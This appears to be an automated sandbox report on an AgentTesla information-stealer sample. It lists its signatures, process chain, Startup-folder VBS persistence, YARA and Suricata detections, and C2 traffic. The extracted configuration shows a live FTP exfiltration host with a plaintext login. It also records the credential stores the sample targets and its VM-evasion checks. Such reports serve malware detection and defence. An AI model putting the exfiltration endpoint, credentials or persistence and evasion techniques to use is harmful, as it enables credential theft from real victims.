Windows Analysis Report
O65887cvz7.exe

Overview

General Information

Sample name: O65887cvz7.exe (renamed because original name is a hash value)
Original sample name: f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94.exe
Analysis ID: 1549420
MD5: 7059c9fae0e7595bf454796551c79dab
SHA1: ef9d22e79dd8f6482c1e1b6c285555b23026575e
SHA256: f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94
Tags: AgentTesla, exe, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • O65887cvz7.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\O65887cvz7.exe" MD5: 7059C9FAE0E7595BF454796551C79DAB)
    • InstallUtil.exe (PID: 4324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 1984 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnerException.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Roaming\InnerException.exe" MD5: 7059C9FAE0E7595BF454796551C79DAB)
      • InstallUtil.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0.2.O65887cvz7.exe.5680000.13.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
4.2.InnerException.exe.3da3db0.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.2.InnerException.exe.3da3db0.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.InnerException.exe.3da3db0.3.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.InnerException.exe.3da3db0.3.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | (strings listed below)
  • 0x2e67c:$s2: GetPrivateProfileString
  • 0x2dd9d:$s3: get_OSFullName
  • 0x2f38e:$s5: remove_Key
  • 0x2f56c:$s5: remove_Key
  • 0x3047a:$s6: FtpWebRequest
  • 0x31243:$s7: logins
  • 0x317b5:$s7: logins
  • 0x344ba:$s7: logins
  • 0x34578:$s7: logins
  • 0x35e7e:$s7: logins
  • 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)

                    System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", ProcessId: 1984, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs", ProcessId: 1984, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\O65887cvz7.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T16:15:03.349715+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49707 | TCP
2024-11-05T16:15:41.776869+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49873 | TCP
2024-11-05T16:14:49.414192+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 5.2.84.236 | 21 | TCP
2024-11-05T16:15:02.464005+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 5.2.84.236 | 21 | TCP
2024-11-05T16:14:50.253913+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 5.2.84.236 | 58644 | TCP
2024-11-05T16:14:50.259852+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 5.2.84.236 | 58644 | TCP
2024-11-05T16:15:03.287183+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 5.2.84.236 | 59913 | TCP
2024-11-05T16:15:03.294837+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 5.2.84.236 | 59913 | TCP

                    AV Detection

Source: O65887cvz7.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\InnerException.exe, Avira: detection malicious, Label: TR/AD.GenSteal.dkodx
Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: C:\Users\user\AppData\Roaming\InnerException.exe, ReversingLabs: Detection: 75%
Source: O65887cvz7.exe, ReversingLabs: Detection: 75%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\InnerException.exe, Joe Sandbox ML: detected
Source: O65887cvz7.exe, Joe Sandbox ML: detected
Source: O65887cvz7.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: O65887cvz7.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp

                    Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49705 -> 5.2.84.236:58644
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49704 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49706 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49709 -> 5.2.84.236:59913
Source: global traffic, TCP traffic: 192.168.2.5:49705 -> 5.2.84.236:58644
Source: Joe Sandbox View, IP Address: 5.2.84.236 5.2.84.236
Source: Joe Sandbox View, ASN Name: ALASTYRTR ALASTYRTR
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49707
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49873
Source: unknown, FTP traffic detected: 5.2.84.236:21 -> 192.168.2.5:49704
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 100 allowed.
220-Local time is now 18:14. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 10 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000002.00000002.2179804969.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.000000000260C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, SKTzxzsJw.cs, .Net Code: RePIUNFdBeM

                    System Summary

Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002B41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2033226685.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2054826719.0000000005772000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2053593213.0000000005280000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameIwfth.dll" vs O65887cvz7.exe
                    Source: O65887cvz7.exe Binary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: O65887cvz7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: InnerException.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: O65887cvz7.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: InnerException.exe.0.dr, -.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
